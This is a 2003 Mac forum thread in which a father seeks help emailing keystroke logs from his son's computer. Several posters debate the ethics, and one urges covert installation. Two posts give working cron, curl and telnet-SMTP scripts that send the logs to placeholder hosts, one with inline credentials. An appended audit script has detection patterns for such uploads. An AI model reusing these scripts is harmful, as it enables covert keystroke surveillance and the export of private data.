The macosxhints Forums


rjc3 11-21-2003 03:19 PM

Evil dad needs help spying on son
 
For reasons discussed in a macnn forum (http://forums.macnn.com/showthread.p...hreadid=189139), I'd like to set up a cron script that will periodically email me the keystroke log file from my son's computer. Before you jump on me with scathing criticisms, I respectfully ask that you read the discussion on the macnn forum listed above for a sense of what is going on. What I really need is help writing the cron script. My son will be aware that his computer has a keystroke logger installed and that it will periodically email me the log, so it doesn't need to be completely invisible, but I'd like it to be as unobtrusive as possible.
My son is at boarding school and has dial up internet access, so his computer will not always be on the net. I've fooled around a little with the terminal, but only when I have very specific instructions as to what I should do. I need someone to tell me exactly what needs to be done in the terminal to accomplish my goals. I would really appreciate any assistance the forum can offer.
Thank you in advance for your help.
rjc3

hayne 11-21-2003 03:42 PM

hopeless
 
Well I read through the forum discussion that you linked to and I do sympathize. But I think it is hopeless to install a keystroke logger and expect that your son will not be able to disable it if he wants to. Especially if you tell him that you are doing this - as you evidently have decided to (I agree - you certainly should tell him if you do this!).

Anyone with physical access to a computer can get full control over that computer. The knowledge needed to do this would be available to your son within 3 minutes of doing a google search.

The only hope of control or secure monitoring of his Internet activities would be via the network that he connects to - i.e. via machines that he does not have any control over.

mervTormel 11-21-2003 03:48 PM

i've got to agree with hayne, here. this approach will most certainly fail shortly. or worse, you'll get crafted, pedestrian reports that will give you a false sense of surety.

petey 11-21-2003 03:53 PM

there are several commercial/shareware packages to accomplish this.

depending on your son's level of expertise, he could disable any of these, but unless he were pretty smart about how he went about this (ie, sometimes turned it off, sometimes turned it on) you would at least know he'd disabled it.

and of course, he could always use someone else's machine...

i'd say the best bet would be to install a commercial solution, and not inform him. properly designed, a system would be difficult to find unless the user's tech knowledge of the OS X system was pretty high.

rjc3 11-21-2003 04:21 PM

thanks for the comments. I'm not worried about my son tampering with the terminal. He is aware spyware is being installed, and will be instructed that if the log stops reporting, or exhibits other suspicious behaviour, there will be hell to pay. I acknowledge the possibility that he will simply use a friend's computer to do the evil deed, and am not aware of any way to prevent this. However, I have assured the court that I will do everything in my power to make sure he doesn't do it again, and if he does it on a friend's computer, at least I can demonstrate to the court that I took every reasonable precaution.
And really, I am already committed to this idea and am simply looking for the cron command. Thank you.

hayne 11-21-2003 04:30 PM

You don't need a cron command or any knowledge of Terminal - you should just install one of the several keylogging applications that you will find on shareware sites and which I think were already pointed out to you in that MacNN forum.

sao 11-21-2003 04:40 PM

rjc3,

Me too, I believe that what you want to do, will not work, despite your good intentions of protecting your son against himself.

IMHO, best monitoring is done by keeping your son near, sharing and doing things together, lots of love, patience and understanding, and not having him far away at a boarding school (especially when he is going through a rough time in his young life) as he might need to feel the confidence and support of the people who love him.

I wish the best of luck for your son and you...!

petey 11-21-2003 04:45 PM

Quote:

Originally posted by rjc3

if the log stops reporting, or exhibits other suspicious behaviour, there will be hell to pay.

...

And really, I am already committed to this idea and am simply looking for the cron command. Thank you.
if you gave me that iBook, with the knowledge that spyware was present, i could find it and send fake logs. i don't know about level of your son's OS system literacy, but that's why you might want to consider not telling him about the spyware, if it's not too late.

of course, if your priority is trying to protect yourself in the court's eyes, this isn't an issue.

---

writing this yourself won't be trivial. i'd consider pre-packaged solutions.

hayne 11-21-2003 04:48 PM

Quote:

Originally posted by petey
you might want to consider not telling him about the spyware, if it's not too late
Not disclosing the existence of spyware would be an intolerable breach of trust that would likely cause much more damage than anything his son might do. It would be intolerable if this was an employer-employee relationship but here this is father-son!

petey 11-21-2003 05:00 PM

Quote:

Originally posted by hayne

Not disclosing the existence of spyware would be an intolerable breach of trust that would likely cause much more damage than anything his son might do. It would be intolerable if this was an employer-employee relationship but here this is father-son!
morality is obviously a hell of a lot more complex than tech, and given the background of the situation, the father here may have cause for that type of sneakiness. then again, he may not.

it's a grey and murky decision, and happily, the morality of the issue isn't my call.

i'm more interested in the practicalities of the tech solutions, and as far as that goes, almost any solution where the son is informed that spyware is present is incredibly vulnerable to undetectable failure if the son has good tech proficiency, or is sufficiently motivated to acquire good tech proficiency.

hayne 11-21-2003 05:11 PM

Quote:

Originally posted by petey
morality is obviously a hell of a lot more complex than tech
Indeed - and not to beat a dead horse, but I wasn't recommending anything on the basis of right or wrong - I was instead recommending on the basis of likeliness to succeed in the higher goal of helping his son. I.e. I feel that the father-son relationship is too valuable to risk for such monitoring.

breen 11-21-2003 06:25 PM

rjc3 --

Sounds like you (and your son!) are in a tough situation. I share the others' reservations about the logger, but I also think I understand your reasoning.

To automate the cron job you might consider installing anacron, which you can install from fink.

The main page had a hint this week talking about anacron.

I'll also throw this one out for your consideration: have you thought about having the logs sent to you using a command script, and telling him to click on that script once a day to run it? I don't think that the logs you receive under that sort of arrangement would be any more vulnerable to alteration than ones sent by a cron job.

It would allow you to try to reestablish a degree of trustful communication with your son.

In any event, good luck to you both.

Breen

lolajl 11-21-2003 08:19 PM

Went over to the other site and read through the thread. I'd have to agree with you, you do need to be able to monitor your son's online activity. Wish I knew of programs for the mac to do this but I don't.

Going a bit off the topic, there may be a good reason for sending the son off to boarding school - to get the son away from his young friends who are bad influence. And, the role of a parent at this stage is to be a parent, not be a best friend. If that means laying down the law so be it.

macmath 11-21-2003 08:53 PM

I had a lot of ideas about being a parent before I became one, but once I did become a parent my outlook was completely different. Beforehand I almost thought of a parent as a policeman or a judge and jury (although nice ones), but afterward I realized that their role is more like that of a guide. [I had excellent parents, so it is not their fault that my view of disciplining was warped.]

While monitoring without telling him might be efficient at policing, it does not show him that he can go to his parents (or people close to him) when he needs help and work with them to achieve a goal, and it does not help him learn how to avoid the problem himself long term. If he ever discovered the surreptitious monitoring, it will teach him that he can't trust his parent (or they don't trust him). Ultimately this might drive him away from people who are close to him and teach him to be a loner or to try to deal with problems all by himself (not always easy or possible).

By working with him in this way, with his knowledge, the parent is working with him to provide a bit of a buffer against the temptation to repeat the offense. While he could still repeat the offense, it would not be as easy and this additional effort along with his conscience might very well prevent it. At any rate, it is a model for working with people close to you to overcome difficulties. It might not work, but then again it would not have worked anyway; ultimately the goal is not one of apprehension but one of teaching him to guide himself.

My parents were pretty strict with us until the 8th grade, at which time we were given all the latitude in the world to work with. It is difficult to learn responsibility if you are not extended enough freedom to practice responsibility. If we made mistakes, we were still at home and in an environment where we could easily get help managing ourselves. By the time we left home for college, we were all ready for the resulting independence.

Anyway, sorry for the long letter. It is not a claim that I know anything or everything, just a statement of the north star my parents taught me to use as a guide.

macmath 11-21-2003 08:56 PM

I started this letter and then started some laundry and came back and finished the letter. Moreover the letter took a long time to write and was started before lolajl had posted. I did not read lolajl's post until after I had finished the above letter. I want it to be clear that my comments about 'not being a policeman' were not inspired by lolajl's letter. There is truth in what he says about sometimes 'laying down the law'.

Echidna 11-21-2003 09:00 PM

How does the keylogger save the files? Are there a bunch of files or just one? How large are the files? Does he use Panther?

Is emailing the files really the best way to do it? I mean, how large might these files get? It could easily overflow your email space if you only get about 15MB worth of mailbox space (very typical).

Is cron the best beast for the job? I mean, they tend to be extremely hit-or-miss, and you're hitting another barrier with the dialup internet access (not always on). Perhaps it would make more sense to wrap it in a daemon that would trigger every time he dials up. Of course, that's where my help would end, since I've never done anything like that.

EatingPie 11-21-2003 11:11 PM

I think some of what you're asking is certainly doable. I have no real knowledge of keystroke recorders (one was just announced, though I can't remember its name... see what I mean!), but I can point out a few UNIXy things.

First, you must take away administrator privileges, and enter an administrator password yourself. Yeah, it will severely limit his ability to install some software, but oh well. He can also reset the root/admin password if he has access to the Panther install disks, and there is just plain no way around this fact.

Okay, your second trick is to set up the key generator to "respawn" whenever it is killed. Try, for example to kill cupsd. Yeah it dies, but a new one starts right back up!

These two tricks guarantee that your son will not be able to stop the key logging. Nor will he be able to delete the log files.

Unfortunately, I do not know how to designate a process to respawn whenever it's killed. But it may be that key loggers do this by default (I mean if it dies, what good is having it?). And I am sure that some more admin-experienced OS X users here can throw some instructions your way.

You definitely do not want to use cron for the logger. It needs to be started at boot, be running as root, and respawn whenever it dies.

That said, you probably *do* want to use cron to e-mail the logs. In this regard you would have two things going on: the key logger running at all times, an e-mailer started by cron every so often to e-mail the logs. (Again, I imagine some key loggers would be designed to do both of these.)

Sure, your son can keep the logs from being downloaded/e-mailed to you (but then he won't be on the Internet, so problem solved!). And sure, he can reformat the drive. And yeah, he can reset the password with the install CD. These issues are insurmountable... on any computer system!

Good luck.

sao 11-22-2003 12:04 AM

Quote:

lolajl wrote:
there may be a good reason for sending the son off to boarding school - to get the son away from his young friends who are bad influence. And, the role of a parent at this stage is to be a parent, not be a best friend.
Probably, but still this doesn't "smell" right to me. Something went wrong here from the very beginning...besides, do you know many thieves who got reformed because they went to jail?

Love is truly much more powerful than reason.

EatingPie 11-22-2003 05:23 PM

Quote:

.besides, do you know many thieves who got reformed because they went to jail?
Do you know many thieves?

Okay, at this point maybe it would be a good idea to end the debating and answer the poor guy's question...

rusto 11-22-2003 05:45 PM

Roger that, he wanted help on keylogging and I think he's established enough justification for it. The risk of losing his son's trust is far outweighed by the risk of what would happen to his son's future were he to repeat his past errors. I lied plenty to my parents at that age...

RichB 11-22-2003 07:41 PM

Quote:

Originally posted by EatingPie
He can also reset the root/admin password if he has access to the Panther install disks, and there is just plain no way around this fact.
You can disable the ability to boot from a CD with Open Firmware Password.

sao 11-23-2003 09:13 AM

Quote:

EatingPie wrote:
Do you know many thieves?
No, I don't. Sorry you couldn't understand what I really meant with that sentence.

Quote:

EatingPie wrote:
Okay, at this point maybe it would be a good idea to end the debating and answer the poor guy's question...
No debating here, I feel great respect for the father and son problems, just wanted to help from another point of view, that's all.

And for answering his question, I think he already got several good suggestions on how to do it in the posts at MacNN and here on this thread, including quite a good suggestion by yourself.

EatingPie 11-23-2003 06:42 PM

Quote:

No, I don't. Sorry you couldn't understand what I really meant with that sentence.
Oh no I did understand. My point was that most people don't know any thieves, or inmates for that matter, so it's not a very solid argument to say "do you know many thieves who got reformed because they went to jail." The answer is almost invariably "no" but *not* because jail didn't work, but because they just don't know any thieves!

Uh oh..... I just realized I'm arguing with the moderator! Forget everything I just said... and pleaaaaseeee don't ban me!! :)

acme.mail.order 11-23-2003 10:31 PM

Looks like I missed a good debate last night - maybe we should add a Family Counselling section. If the son comes here next month and asks for help removing spyware I wonder if there will be the same amount of discussion about whether that's a good idea or not.
<end of sarcasm>
Mr. Rjc came to us for help of a computational nature - he's already been through the moralizing and doesn't need his family's issues publicly flogged again.

The last post by Mr. Rjc requested help with the cron command. You don't say how unix-fluent you are, so let's start with the basics.

Cron by itself will run a single command, or a script, at the specified time. You will have a problem with the internet connection here, unless you set cron to run frequently. (say, top of every hour). To move a file from a local machine to a known remote machine with ftp my personal favourite is curl.
So: create the cron entry to run a command every hour
-------------code----------------------
]$ su
]# crontab -e
i
0 */1 * * * /path/to/script
<esc>:wq
--------------/code---------------------

next, save this script somewhere in protected space, and make it executable (with chmod +x filename)

-------------code----------------------
#!/bin/sh
# upload the log file over ftp; -u takes user:password as a single argument
curl -s -T /path/to/logs -u username:password --url ftp://www.website.com/folder/file
--------------/code---------------------


Cron requires that you have an ftp server in a known location. Sign up for some free webhosting somewhere. If the computer is not connected when the script runs curl will fail silently until the next time.

Using sendmail will be a bit more complicated, as you will have to configure sendmail properly and activate it in the startup configuration. Write back if you prefer this route.


Since the issue of local monitoring seems to be well answered both here and elsewhere I will add one suggestion that seems to have been largely ignored. As it has been well-established that a non-secret logging system is easy to bypass, and your issue seems to be one of honesty-checking rather than true monitoring, perhaps you should ask the ISP in the school's area to send you copies of the connection logs. Since I presume you are paying this should not be a problem if you explain the reasons to the company's security manager. The ISP's logs can be compared to the machine's local records to see if everything is in order (or not). If they give you grief you could go back to the judge for an order. The ISP is also able to record every packet in and out to a connection, but they will probably need an official boot in the rear to do this.

If the school ever gets broadband access consider using OSXVnc, available from www.redstonesoftware.com/osxvnc
It's started from an ssh session and runs entirely in the background. Gives you a complete view of the desktop in real time. I use it to remote administer a friend's Mac in Canada from my home in Japan. But it's too bandwidth-intensive to use on a dial-up.

sao 11-24-2003 04:25 AM

Quote:

EatingPie wrote:
Oh no I did understand. My point was that most people don't know any thieves, or inmates for that matter, so it's not a very solid argument to say "do you know many thieves who got reformed because they went to jail." The answer is almost invariably "no" but *not* because jail didn't work, but because they just don't know any thieves!
Of course point taken, I stand corrected, perhaps I should have expressed myself better, maybe by saying something like... "I believe that jail, most of the time, doesn't reform criminals".

Quote:

EatingPie wrote:
Uh oh..... I just realized I'm arguing with the moderator! Forget everything I just said... and pleaaaaseeee don't ban me!! :)
EatingPie, for me, we are just having a conversation, no arguing here. Everybody is allowed to share their point of view in these forums as long as it is done in a respectful and civilized manner. :)

anthlover 11-24-2003 08:57 AM

I like acme.mail.order's suggestion of Pursuing the ISP for logs
 
RE: I like acme.mail.order's suggestion of Pursuing the ISP for logs

There seems to be a certain elegance to it.
Now of course anything can be circumvented.... e.g. A different ISP, Internet Cafe, etc. However, this is no worse than reinstalling the OS, cracking a Logger etc.
The only down side is that "rjc3/Evil Dad" might be uncomfortable Approaching the ISP.
---------------------------------------------------------

I have a silly ? Did the judge really intend for you to make this specific HUGE effort, rather than just having HEART TO HEART conversations on a regular basis? You need not answer. Just think about what I and others wrote e.g., below.

It seems that those that are misguided can be guided, and those that are so troubled that they are self destructive will find a way to do so in spite of and or because of the measures we are discussing.

Finally, counseling is probably something worth considering perhaps for one or both parties.
There may also be suggested courses of Action by the court or professionals (in situations like these). I would not dismiss them.

Good Luck.

rgray 11-24-2003 09:24 AM

I think the ISP logs are a good way to go. But do you pay the ISP or is it your son's name on the account? In the first case the logs are yours. The latter case could be more difficult. However, if I understand correctly, should the court order you to do something it is also obligated to be sure there is some way for you to accomplish that order. The logs are arguably necessary. Ergo, a court order should be a foregone conclusion.

anthlover 11-24-2003 10:16 AM

ISPs have to Comply with this stuff all the time for Police and court cases
 
ISPs have to Comply with this stuff all the time for Police and Court cases...

Not sure how it works proactively. Certainly a court order works 100%. Court could advise on methodology or form that had to be filled out.

I would approach the ISP first anyway. Probably easier to get on the Phone...

Irene 11-24-2003 01:49 PM

commercial apps for this
 
I have TypeRecorder on my computer (Jaguar) and the company sent notice that it is working on a version for Panther but also mentioned products (see below) that might do exactly what you want since they are designed for remote viewing of the type you require. I use TypeRecorder in case I ever trash a letter or an email and then realize the next day that I want to send a portion of it to someone else.

Spector 3.0 for OS X, and ViewRemote 2.16 for OS X.
Spector (see www.spectorsoft.com) records everything that happens on your computer---in addition to keystrokes it also records screenshots,
so you can watch your computer like a movie.
ViewRemote has all the features of TypeRecorder but allows you to view logs from ANYWHERE in the world---it records everything that happens on your
computer, like TypeRecorder, and securely sends it to a server. See www.viewremote.com.

anthlover 11-24-2003 03:21 PM

Interesting and Spooky software IMHO
 
Spector Requires: Approximately 80MB of disk space for a typical day of recording

I suppose there are options to turn off the screen shots to save space for Dial Up?

nura 11-25-2003 11:03 AM

logging space and fraud security
 
a way to get it all done quite smooth is to have the cronjob running which additionally will compress (unix compress should be fine) the file and also run via the script a file encrypter. if you need more help on this let me know.

vonleigh 11-29-2003 06:29 AM

Hello,

Well here's how I would go about it. First get a keylogging software:

<http://www.macupdate.com/search.php?...x=0&button.y=0>

This one has the best reviews:

<http://www.macupdate.com/info.php/id/12000>

I'd configure that one to only take pictures of the screen if certain important keywords came up or the files could end up being too large.

Anyway, I'd first install anacron with fink, that way the cron would get run even if the computer is asleep at the time, then I'd write up a daily.local and put it in /etc.

The other thing I'm doing in the script is talking smtp manually, the reason for this is that to run the mail command I think you need to have sendmail or postfix running, which I think complicates things a bit. Anyway, the script uses telnet.

/etc/daily.local

Code:

#!/bin/sh

date=`/bin/date +%d.%m.%y`
file=/var/tmp/logs.${date}.tar.gz


/sw/bin/tar -cz --file=${file} /path/to/logs

/usr/bin/openssl enc -base64 -in ${file} -out ${file}.base64

mail=/var/tmp/mail.${date}

/bin/cat > ${mail} << _eof
HELO example.com
MAIL FROM:sonsname@example.com
RCPT TO:yourname@example.com
DATA
MIME-Version: 1.0       
Content-Type: multipart/mixed;
    boundary="<boundary>"
Content-Disposition: inline
Subject: Key log for ${date}

--<boundary>
Content-Transfer-Encoding: base64
Content-Type: text/plain;
    name="<${file}>"
Content-Disposition: attachment;
    filename="<${file}>"

_eof

/bin/cat ${file}.base64 >> ${mail}

/bin/cat >> ${mail} << _eof
--<boundary>--

.
QUIT
_eof

telnet mail.example.com 25 < ${mail}

And that should work well. Unfortunately when testing it doesn't work as advertised, yet I'm not sure why. If I telnet to port 25 of my mailserver and paste in the ${mail} file generated it works perfectly, but if I use:

telnet mail.example.com 25 < ${mail}

It doesn't work and my mailserver complains that: "did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA"

Can someone clear up why?


v

nura 12-01-2003 07:22 AM

why telnet 25
 
if you are already using telnet why not do a rcp ? this way you can use the standard ports and no playing with a mail server ?!

vonleigh 12-01-2003 05:37 PM

Because then he needs to set up either a static IP, or get dyndns.org set up. Additionally he has to enable telnet on his box, which is (I think) a security risk as telnet transmits passwords in clear text. If we were to do that, then I guess we'd have to set it up with ssh and a key, use scp.

By emulating a mailserver I thought it'd be the easiest way. And again, the message generated actually works when copied and pasted, it doesn't work when using redirects. I think maybe redirects aren't doing what I think they should be doing.

Reading through the telnet manual I can't find anything that would work, thought of trying .telnetrc: "Lines that begin without white space are the start of a machine entry" but that didn't work.

Maybe it'd be better if instead of using telnet I use netcat.
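
An audit for the kind of scheduled transfer job discussed in acme.mail.order's and vonleigh's posts, as an added example that is not part of the original thread: it parses a crontab, rejects malformed schedule fields, and flags jobs whose command or script uploads a file with curl, carries credentials on the command line, or speaks SMTP through telnet/netcat. The crontab, script paths, hostnames, credentials and rule names are all constructed for illustration, and only numeric and `*` schedule fields are supported (no month or day names, no `@hourly`).

```python
import re

# Constructed sample data: a root crontab and the scripts it references.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 * * * * /usr/local/sbin/push-logs.sh
30 2 * * * /usr/local/sbin/mail-logs.sh
15 3 * * * /usr/sbin/periodic daily
0 /1 * * * /usr/local/sbin/broken.sh
"""
SAMPLE_SCRIPTS = {
    "/usr/local/sbin/push-logs.sh":
        "#!/bin/sh\n"
        "curl -s -T /var/log/keys.log -u alice:s3cret ftp://ftp.example.com/in/\n",
    "/usr/local/sbin/mail-logs.sh":
        "#!/bin/sh\ntelnet mail.example.com 25 < /var/tmp/mail.txt\n",
    "/usr/sbin/periodic": "#!/bin/sh\n# rotates logs\n",
}

# One cron time field: '*' or N or N-M, optional /step, comma-separated lists.
FIELD = re.compile(r"^(\*|\d+(-\d+)?)(/\d+)?(,(\*|\d+(-\d+)?)(/\d+)?)*$")

# Hypothetical rule names; each pattern is applied line by line.
RULES = [
    ("upload", re.compile(r"\bcurl\b.*\s(-T|--upload-file)\b")),
    ("inline-credentials", re.compile(r"\s(-u|--user)\s+\S+:\S+")),
    ("raw-smtp", re.compile(r"\b(telnet|nc|netcat)\b\s+\S+\s+25\b")),
]


def parse_crontab(text):
    """Yield (lineno, schedule_ok, command) for every job line."""
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        # Skip blanks, comments and environment assignments (MAILTO=...).
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*\s*=", line):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            yield lineno, False, line
            continue
        yield lineno, all(FIELD.match(f) for f in parts[:5]), parts[5]


def audit(crontab_text, scripts):
    """Return a list of (crontab line number, finding) tuples."""
    findings = []
    for lineno, schedule_ok, command in parse_crontab(crontab_text):
        if not schedule_ok:
            findings.append((lineno, "invalid-schedule"))
            continue
        # Inspect the cron command itself plus the script it launches, if known.
        target = command.split()[0]
        text = command + "\n" + scripts.get(target, "")
        lines = [l for l in text.splitlines() if not l.lstrip().startswith("#")]
        for name, pattern in RULES:
            if any(pattern.search(l) for l in lines):
                findings.append((lineno, name))
    return findings


if __name__ == "__main__":
    for lineno, finding in audit(SAMPLE_CRONTAB, SAMPLE_SCRIPTS):
        print(f"crontab line {lineno}: {finding}")
```

The `invalid-schedule` finding on the last sample line is the `/1` hour field, which cron rejects because a step needs a range or `*` in front of it.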


All times are GMT -5. The time now is 06:11 PM.
